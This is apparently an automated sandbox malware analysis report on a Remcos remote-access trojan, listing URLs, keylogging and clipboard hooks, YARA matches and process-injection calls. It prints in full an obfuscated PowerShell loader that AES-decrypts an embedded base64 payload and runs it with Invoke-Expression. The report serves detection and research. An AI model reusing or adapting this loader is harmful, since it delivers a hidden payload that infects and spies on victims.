                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: RegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhvDE09.tmp.4.drString found in binary or memory: https://www.office.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000003_2_0040A2B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B70E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004168C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,4_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,7_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,3_2_0040B70E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_0040A3E0

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Notepo\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C9E2 SystemParametersInfoW,3_2_0041C9E2

                    System Summary

                    barindex
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.powershell.exe.1f163071700.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 1.2.powershell.exe.1f163071700.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 6744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 1344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116Jump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_004180EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,3_2_004132D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,3_2_0041BB09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,3_2_0041BB35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004016FD NtdllDefWindowProc_A,5_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004017B7 NtdllDefWindowProc_A,5_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004167B4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043E0CC3_2_0043E0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041F0FA3_2_0041F0FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004541593_2_00454159
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004381683_2_00438168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004461F03_2_004461F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043E2FB3_2_0043E2FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0045332B3_2_0045332B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042739D3_2_0042739D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004374E63_2_004374E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043E5583_2_0043E558
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004387703_2_00438770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004378FE3_2_004378FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004339463_2_00433946
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044D9C93_2_0044D9C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00427A463_2_00427A46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DB623_2_0041DB62
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00427BAF3_2_00427BAF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00437D333_2_00437D33
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00435E5E3_2_00435E5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00426E0E3_2_00426E0E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043DE9D3_2_0043DE9D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00413FCA3_2_00413FCA
